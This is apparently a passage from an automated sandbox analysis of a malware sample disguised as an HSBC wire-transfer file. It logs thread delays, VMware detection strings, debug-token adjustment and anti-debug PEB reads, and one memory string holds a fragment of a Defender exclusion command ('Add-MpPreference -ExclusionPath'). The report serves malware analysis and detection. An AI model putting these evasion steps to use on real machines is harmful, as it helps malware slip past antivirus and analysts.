          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238999
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238889
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238781
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238670
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238560
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238453
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238343
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238000
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 237203
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 236703
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 236534
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 236406
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeWindow / User API: threadDelayed 985
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeWindow / User API: threadDelayed 1635
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 240000
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239841
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 36646
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239686
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239577
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239452
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239342
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239233
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239124
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238999
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238889
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238781
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238670
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238560
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238453
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238343
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238000
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 237203
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 236703
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 236534
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 236406
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 922337203685477
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 0000000C.00000000.303809038.000000000EE50000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}1
          Source: explorer.exe, 0000000C.00000000.303809038.000000000EE50000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b1
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 0000000C.00000000.301310176.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 0000000C.00000000.335138574.0000000008778000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
          Source: explorer.exe, 0000000C.00000000.330618506.00000000067C2000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000C.00000000.301310176.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
          Source: explorer.exe, 0000000C.00000000.330618506.00000000067C2000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
          Source: explorer.exe, 0000000C.00000000.301310176.00000000086C9000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_00409AB0 rdtsc
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0162C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0162B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0162B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01644120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01644120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01644120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01644120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01644120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01629100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01629100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01629100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016B41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0162B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0162B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0162B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016561A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016561A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016499BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016499BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016499BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016499BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01652990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01640050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01640050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0163B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0163B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0163B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0163B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016240E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016240E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016240E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016258EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016BB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016690AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01629080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0162DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01653B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01653B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0162DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0162F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016D23E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016D23E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016D23E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01654BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01654BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01654BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01631B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01631B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016DD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01652397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016DB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016DB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0166927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01629240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01629240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01629240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01629240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016EEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016B4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01664A2C mov eax, dword ptr fs:[00000030h]
